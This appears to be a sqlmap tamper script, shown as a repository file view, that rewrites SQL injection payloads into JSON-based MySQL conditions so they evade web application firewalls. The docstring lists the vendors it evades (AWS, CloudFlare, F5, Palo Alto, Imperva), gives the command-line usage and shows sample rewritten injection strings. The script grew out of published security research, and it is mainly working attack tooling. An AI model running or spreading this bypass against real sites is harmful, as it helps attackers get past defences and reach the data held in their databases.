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* added JSON waf bypass techniques * added a link for WAF evasion technique blog * Added generic JSON WAF bypass
164 lines
5.2 KiB
Python
164 lines
5.2 KiB
Python
#!/usr/bin/env python
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"""
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Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
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See the file 'LICENSE' for copying permission
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"""
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# Patterns breaks down SQLi payload into different compontets, and replaces the logical comparison.
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pattern = r"(?i)(?P<pre>.*)\s*\b(?P<relation>AND|OR)\b\s*(?P<leftComponent>\(?\'.*?(?<!\\)(?:\'|\Z)\)?|\(?\".*?(?<!\\)(?:\"|\Z)\)?|\(?\d+(?!x[a-f0-9])\)?)(?P<operator>=|=|like)(?P<rightComponent>\(?\'.*?(?<!\\)(?:\'|\Z)\)?|\(?\".*?(?<!\\)(?:\"|\Z)\)?|\(?\d+(?!x[a-f0-9])\)?)(?P<post>.*)"
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import re, random, string
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from lib.core.enums import PRIORITY
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__priority__ = PRIORITY.HIGHEST
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def dependencies():
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pass
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# Possible int payloads:
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# 1) JSON_LENGTH()
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# 2) json_depth
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# 3) JSON_EXTRACT()
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def generate_int_payload():
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INT_FUNCTIONS = [generate_length_payload, generate_depth_paylod, generate_int_extract_payload]
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return (random.choice(INT_FUNCTIONS))()
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# Possible STR payloads:
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# 1) SELECT JSON_KEYS('{"a": 1, "b": {"c": 30}}');
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# 2) JSON_EXTRACT
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# 3) JSON_QUOTE('null')
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def generate_str_payload():
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print("generate_str_payload")
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STR_FUNCTIONS = [generate_str_extract_payload, generate_quote_payload]
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return (random.choice(STR_FUNCTIONS))()
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return 'JSON_EXTRACT(\'{"a": "1"}\', \'$.a\') = \'1\''
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def generate_random_string(length=15):
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str_length = random.randint(1,length)
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return "".join(random.choice(string.ascii_letters) for i in range(str_length))
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def generate_random_int():
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return random.randint(2, 10000)
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def generate_length_payload():
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return f"JSON_LENGTH(\"{{}}\") <= {generate_random_int()}"
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def generate_depth_paylod():
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return f"JSON_DEPTH(\"{{}}\") != {generate_random_int()}"
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def generate_quote_payload():
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var = generate_random_string()
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return f"JSON_QUOTE('{var}') = '\"{var}\"'"
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def generate_int_extract_payload():
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return generate_extract_payload(isString=False)
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def generate_str_extract_payload():
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return generate_extract_payload(isString=True)
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def generate_extract_payload(isString=False):
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key = generate_random_string()
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if isString:
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value = generate_random_string()
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return f'JSON_EXTRACT(\'{{"{key}": "{value}"}}\', \'$.{key}\') = \'{value}\''
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value = generate_random_int()
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return f'JSON_EXTRACT("{{\\"{key}\\": {value}}}", "$.{key}") = "{value}"'
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def generate_payload(isString, isBrackets):
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payload = '(' if isBrackets else ""
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if isString:
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payload += generate_str_payload()[:-1] # Do not use the last ' because the application will add it.
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else:
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payload += generate_int_payload()
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return payload
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def generate_random_payload():
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if random.randint(0,1):
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return generate_str_payload()
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return generate_int_payload()
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def tamper(payload, **kwargs):
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"""
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Bypasses generic WAFs using JSON SQL Syntax.
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For more details about JSON in MySQL - https://dev.mysql.com/doc/refman/5.7/en/json-function-reference.html
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Tested against:
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* MySQL v8.0 - however every version after v5.7.8 should work
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Usage:
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python3 sqlmap.py <TARGET> --tamper json_waf_bypass_mysql.py
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Notes:
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* References:
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* https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf
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* https://www.blackhat.com/eu-22/briefings/schedule/#js-on-security-off-abusing-json-based-sql-queries-28774
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* Usefull for bypassing any JSON-unaware WAFs with minor-to-no adjusments
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* JSON techniques were tested againts the following WAF vendors:
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* Amazon AWS ELB
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* CloudFlare
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* F5 BIG-IP
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* Palo-Alto Next Generation Firewall
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* Imperva Firewall
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* This script alters the SQLi payload by replacing the condition statement with JSON-specific payloads,
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depending on the SQLi type. Here is a list of supported payload types: (int/string depends on the condition check type)
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Possible int payloads:
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1) JSON_LENGTH()
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2) json_depth
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3) JSON_EXTRACT()
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Possible STR payloads:
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1) SELECT JSON_KEYS('{"a": 1, "b": {"c": 30}}');
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2) JSON_EXTRACT
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3) JSON_QUOTE('null')
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>>> tamper("' and 5626=9709 and 'kqkk'='kqkk")
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''' ' and 5626=9709 and JSON_EXTRACT('{"ilDQUNfX": "KuIjjFkFsok"}', '$.ilDQUNfX') = 'KuIjjFkFsok '''
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>>> tamper('and 4515=8950--')
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''' and JSON_EXTRACT("{\"CoGqzQjy\": 3825}", "$.CoGqzQjy") = "3825" '''
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"""
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payload = payload.replace(r'%20', " ")
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#
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retVal = payload
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if payload:
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match = re.search(pattern, payload)
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if match:
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pre = match.group('pre')
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# Is our payload is a string.
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isString = pre.startswith("'")
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isBrackets = pre.startswith("')") or pre.startswith(")")
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wafPayload = generate_payload(isString=isString, isBrackets=isBrackets)
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retVal = f"{match.group('pre')} {match.group('relation')} {wafPayload}{match.group('post')}"
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else:
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if payload.lower().startswith("' union"):
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wafPayload = generate_random_payload()
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retVal = f"' and {wafPayload} {payload[1:]}" # replace ' union select... with ' and FALSE_WAF_BYPASS union select...
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return retVal
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